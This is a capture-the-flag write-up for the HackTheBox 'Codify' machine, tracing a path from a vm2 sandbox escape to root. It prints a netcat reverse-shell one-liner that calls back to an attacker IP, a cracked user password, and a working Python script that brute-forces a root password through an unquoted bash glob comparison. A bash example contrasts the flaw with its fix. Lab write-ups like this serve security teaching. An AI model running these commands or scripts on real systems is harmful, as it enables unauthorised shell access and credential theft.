Codify HTB WRITE UP

WRITE UP

When we connect to the machine, we first scan it with nmap to determine which ports are open and which services we can communicate with or attack.


According to the Nmap results, we have an HTTP port and port 3000 to examine. When we investigate port 3000, we find an online Node.js editor. The editor runs user code inside a JavaScript sandbox named “vm2.”


When we examine this sandbox, we discover that the installed version is vulnerable. Using a code snippet that escapes the sandbox, we achieve remote code execution. The snippet I used is available at the link below.

https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd


Before running the command “rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.42 4242 >/tmp/f” on the victim’s machine, I opened a listener on my own computer. I successfully obtained a shell.


After examining the machine for a while, I noticed a database in the “/var/www/contact” directory. When I examined this database, I found a hash belonging to the user “joshua.”


Since this hash is from “/etc/shadow”, I also took the data from the “/etc/passwd” file and cracked this hash. Our password is “spongebob1”.


After logging back in with joshua’s password, I first checked which files I could access, and then which commands I could run with sudo. When I typed “sudo -l”, I saw that I have permission to run a bash script as sudo. This script is a password check written in bash. However, because the right-hand side of the bash comparison is unquoted, it is treated as a glob pattern, so the expression “password” == “pass*” evaluates to true. Therefore, malicious individuals can exploit this vulnerability to recover the entire password one character at a time.
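To make the comparison bug concrete, here is an added bash example (not the writeup’s script and not the box’s actual code) that places the unquoted “[[ $a == $b ]]” check beside a quoted one; STORED is a constructed sample value, not a password from the machine.

```bash
#!/bin/bash
# Added example: the glob-comparison bug described above, reconstructed from
# the description, next to a quoted comparison that does not have it.
# STORED is a constructed sample value standing in for the script's real secret.
STORED='c0nstructedSample'

# Vulnerable form: an unquoted right-hand side of == inside [[ ]] is a glob
# pattern, so a guess such as "c0n*" matches the longer stored value.
vulnerable_check() {
    local guess="$1"
    [[ $STORED == $guess ]]
}

# Fixed form: quoting the right-hand side makes == a literal string comparison,
# so "c0n*" only matches a stored value that is literally "c0n*".
safe_check() {
    local guess="$1"
    [[ "$STORED" == "$guess" ]]
}

# Runs one guess through both variants and prints the verdicts side by side.
compare() {
    local guess="$1" v s
    vulnerable_check "$guess" && v=match || v=nomatch
    safe_check "$guess" && s=match || s=nomatch
    printf '%-20s vulnerable=%-8s fixed=%s\n' "$guess" "$v" "$s"
}

compare 'c0nstructedSample'   # both match: the exact value
compare 'c0n*'                # vulnerable matches, fixed does not
compare 'c0?structedSample'   # single-character wildcard also leaks
compare 'wrong*'              # neither matches
```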


Therefore, I wrote a Python script that extracts the root user’s password from this bash script using the brute-force method, and I sent it to the victim’s machine.


In this way we obtained the root user’s password. Using this password with the “su” command, I became the root user and obtained the final flag.

The brute-force script I wrote is provided below:

import subprocess
import string
import sys

"""
usage====> python3 brute.py ./file.sh
"""

def run_proc(passwd, char, file):
    # Feed the guess "<known prefix><candidate>*" to the sudo script's password
    # prompt; the trailing "*" is treated as a glob by the script's [[ == ]] check.
    echo_proc = subprocess.Popen(["echo", "-e", passwd + char + "*"],
                                 stdout=subprocess.PIPE, text=True)
    check_proc = subprocess.Popen(["sudo", file], stdin=echo_proc.stdout,
                                  stdout=subprocess.PIPE, text=True)
    echo_proc.stdout.close()
    output, _ = check_proc.communicate()
    return output

# Candidate characters: digits, letters and punctuation (whitespace excluded).
# Glob metacharacters are dropped so each guess contains exactly one wildcard,
# the trailing "*"; a password containing them cannot be recovered this way.
charset = string.digits + string.ascii_letters + string.punctuation
for meta in "*\\?":
    charset = charset.replace(meta, "")
passwd = ""
i = 0

# Try every candidate as the next character. On a hit, append it and restart
# from the first candidate; the loop ends once no candidate extends the prefix,
# which means the whole password has been recovered.
while i != len(charset):
    if "fail" not in run_proc(passwd, charset[i], sys.argv[1]):
        passwd = passwd + charset[i]
        i = -1
        print(passwd)
    i = i + 1

print("The password is", passwd)